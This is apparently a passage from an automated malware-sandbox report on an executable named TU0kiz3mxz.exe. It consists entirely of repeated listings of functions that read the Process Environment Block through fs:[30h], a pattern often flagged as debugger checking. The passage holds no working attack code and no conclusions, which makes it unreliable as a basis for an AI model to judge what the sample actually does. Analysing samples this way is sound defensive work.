          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01148243 mov eax, dword ptr fs:[00000030h]3_2_01148243
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01148243 mov ecx, dword ptr fs:[00000030h]3_2_01148243
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA250 mov eax, dword ptr fs:[00000030h]3_2_010BA250
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B826B mov eax, dword ptr fs:[00000030h]3_2_010B826B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170274 mov eax, dword ptr fs:[00000030h]3_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4260 mov eax, dword ptr fs:[00000030h]3_2_010C4260
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE284 mov eax, dword ptr fs:[00000030h]3_2_010FE284
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE284 mov eax, dword ptr fs:[00000030h]3_2_010FE284
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01140283 mov eax, dword ptr fs:[00000030h]3_2_01140283
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02A0 mov eax, dword ptr fs:[00000030h]3_2_010D02A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02A0 mov eax, dword ptr fs:[00000030h]3_2_010D02A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov ecx, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011562A0 mov eax, dword ptr fs:[00000030h]3_2_011562A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA2C3 mov eax, dword ptr fs:[00000030h]3_2_010CA2C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D02E1 mov eax, dword ptr fs:[00000030h]3_2_010D02E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01156500 mov eax, dword ptr fs:[00000030h]3_2_01156500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8550 mov eax, dword ptr fs:[00000030h]3_2_010C8550
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8550 mov eax, dword ptr fs:[00000030h]3_2_010C8550
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F4588 mov eax, dword ptr fs:[00000030h]3_2_010F4588
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C2582 mov eax, dword ptr fs:[00000030h]3_2_010C2582
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C2582 mov ecx, dword ptr fs:[00000030h]3_2_010C2582
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE59C mov eax, dword ptr fs:[00000030h]3_2_010FE59C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E45B1 mov eax, dword ptr fs:[00000030h]3_2_010E45B1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E45B1 mov eax, dword ptr fs:[00000030h]3_2_010E45B1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE5CF mov eax, dword ptr fs:[00000030h]3_2_010FE5CF
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE5CF mov eax, dword ptr fs:[00000030h]3_2_010FE5CF
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C65D0 mov eax, dword ptr fs:[00000030h]3_2_010C65D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA5D0 mov eax, dword ptr fs:[00000030h]3_2_010FA5D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA5D0 mov eax, dword ptr fs:[00000030h]3_2_010FA5D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC5ED mov eax, dword ptr fs:[00000030h]3_2_010FC5ED
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC5ED mov eax, dword ptr fs:[00000030h]3_2_010FC5ED
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C25E0 mov eax, dword ptr fs:[00000030h]3_2_010C25E0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC427 mov eax, dword ptr fs:[00000030h]3_2_010BC427
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117A456 mov eax, dword ptr fs:[00000030h]3_2_0117A456
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E245A mov eax, dword ptr fs:[00000030h]3_2_010E245A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B645D mov eax, dword ptr fs:[00000030h]3_2_010B645D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114C460 mov ecx, dword ptr fs:[00000030h]3_2_0114C460
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117A49A mov eax, dword ptr fs:[00000030h]3_2_0117A49A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114A4B0 mov eax, dword ptr fs:[00000030h]3_2_0114A4B0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C64AB mov eax, dword ptr fs:[00000030h]3_2_010C64AB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F44B0 mov ecx, dword ptr fs:[00000030h]3_2_010F44B0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C04E5 mov ecx, dword ptr fs:[00000030h]3_2_010C04E5
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC700 mov eax, dword ptr fs:[00000030h]3_2_010FC700
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C0710 mov eax, dword ptr fs:[00000030h]3_2_010C0710
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F0710 mov eax, dword ptr fs:[00000030h]3_2_010F0710
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113C730 mov eax, dword ptr fs:[00000030h]3_2_0113C730
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC720 mov eax, dword ptr fs:[00000030h]3_2_010FC720
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC720 mov eax, dword ptr fs:[00000030h]3_2_010FC720
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F273C mov eax, dword ptr fs:[00000030h]3_2_010F273C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F273C mov ecx, dword ptr fs:[00000030h]3_2_010F273C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F273C mov eax, dword ptr fs:[00000030h]3_2_010F273C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102750 mov eax, dword ptr fs:[00000030h]3_2_01102750
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102750 mov eax, dword ptr fs:[00000030h]3_2_01102750
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01144755 mov eax, dword ptr fs:[00000030h]3_2_01144755
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F674D mov esi, dword ptr fs:[00000030h]3_2_010F674D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F674D mov eax, dword ptr fs:[00000030h]3_2_010F674D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F674D mov eax, dword ptr fs:[00000030h]3_2_010F674D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114E75D mov eax, dword ptr fs:[00000030h]3_2_0114E75D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C0750 mov eax, dword ptr fs:[00000030h]3_2_010C0750
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C8770 mov eax, dword ptr fs:[00000030h]3_2_010C8770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116678E mov eax, dword ptr fs:[00000030h]3_2_0116678E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C07AF mov eax, dword ptr fs:[00000030h]3_2_010C07AF
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011747A0 mov eax, dword ptr fs:[00000030h]3_2_011747A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CC7C0 mov eax, dword ptr fs:[00000030h]3_2_010CC7C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011407C3 mov eax, dword ptr fs:[00000030h]3_2_011407C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114E7E1 mov eax, dword ptr fs:[00000030h]3_2_0114E7E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C47FB mov eax, dword ptr fs:[00000030h]3_2_010C47FB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C47FB mov eax, dword ptr fs:[00000030h]3_2_010C47FB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102619 mov eax, dword ptr fs:[00000030h]3_2_01102619
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E609 mov eax, dword ptr fs:[00000030h]3_2_0113E609
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C262C mov eax, dword ptr fs:[00000030h]3_2_010C262C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE627 mov eax, dword ptr fs:[00000030h]3_2_010DE627
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F6620 mov eax, dword ptr fs:[00000030h]3_2_010F6620
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F8620 mov eax, dword ptr fs:[00000030h]3_2_010F8620
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DC640 mov eax, dword ptr fs:[00000030h]3_2_010DC640
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA660 mov eax, dword ptr fs:[00000030h]3_2_010FA660
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA660 mov eax, dword ptr fs:[00000030h]3_2_010FA660
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118866E mov eax, dword ptr fs:[00000030h]3_2_0118866E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118866E mov eax, dword ptr fs:[00000030h]3_2_0118866E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F2674 mov eax, dword ptr fs:[00000030h]3_2_010F2674
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4690 mov eax, dword ptr fs:[00000030h]3_2_010C4690
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C4690 mov eax, dword ptr fs:[00000030h]3_2_010C4690
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FC6A6 mov eax, dword ptr fs:[00000030h]3_2_010FC6A6
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F66B0 mov eax, dword ptr fs:[00000030h]3_2_010F66B0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]3_2_010FA6C7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA6C7 mov eax, dword ptr fs:[00000030h]3_2_010FA6C7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011406F1 mov eax, dword ptr fs:[00000030h]3_2_011406F1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011406F1 mov eax, dword ptr fs:[00000030h]3_2_011406F1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114C912 mov eax, dword ptr fs:[00000030h]3_2_0114C912
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B8918 mov eax, dword ptr fs:[00000030h]3_2_010B8918
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B8918 mov eax, dword ptr fs:[00000030h]3_2_010B8918
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E908 mov eax, dword ptr fs:[00000030h]3_2_0113E908
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E908 mov eax, dword ptr fs:[00000030h]3_2_0113E908
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114892A mov eax, dword ptr fs:[00000030h]3_2_0114892A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0115892B mov eax, dword ptr fs:[00000030h]3_2_0115892B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01140946 mov eax, dword ptr fs:[00000030h]3_2_01140946
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114C97C mov eax, dword ptr fs:[00000030h]3_2_0114C97C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
